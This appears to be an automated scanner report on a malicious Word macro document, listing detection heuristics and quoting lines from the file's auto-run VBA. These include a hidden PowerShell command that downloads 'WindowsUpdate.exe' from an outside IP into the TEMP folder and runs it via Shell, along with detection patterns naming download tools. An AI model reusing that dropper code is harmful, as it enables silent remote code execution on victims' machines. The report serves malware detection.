Malicious Office (OLE) / .DOC — malware analysis report

Heuristics 13

• ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
• VBA macros detected medium 7 related findings OLE_VBA_MACROS
  Document contains VBA macro code
• Potential Shell call in VBA critical OLE_VBA_SHELL
  Potential Shell call in VBA
  Matched line in script

      Shell str, vbHide

• PowerShell reference in VBA critical OLE_VBA_PS
  PowerShell reference in VBA
  Matched line in script

      str = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command ""(New-Object System.Net.WebClient).DownloadFile('http://192.168.61.128/WindowsUpdate.exe','" & savePath & "')"""

• VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
  The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
  Matched line in script

  Sub Document_Open()

• VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
• AutoOpen macro low OLE_VBA_AUTOOPEN
  AutoOpen macro
  Matched line in script

  Sub AutoOpen()

• Document_Open macro low OLE_VBA_DOCOPEN
  Document_Open macro
  Matched line in script

  Sub Document_Open()

• Environ() call (env variable access) low OLE_VBA_ENVIRON
  Environ() call (env variable access)
  Matched line in script

      savePath = Environ("TEMP") & "\WindowsUpdate.exe"

• Reference to PowerShell high SC_STR_POWERSHELL
  Reference to PowerShell
• LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
  Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
• Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
• Embedded URL info EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://192.168.61.128/WindowsUpdate.exe In document text (OLE body)

  • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Open this report in the interactive analyzer, or submit your own file for analysis.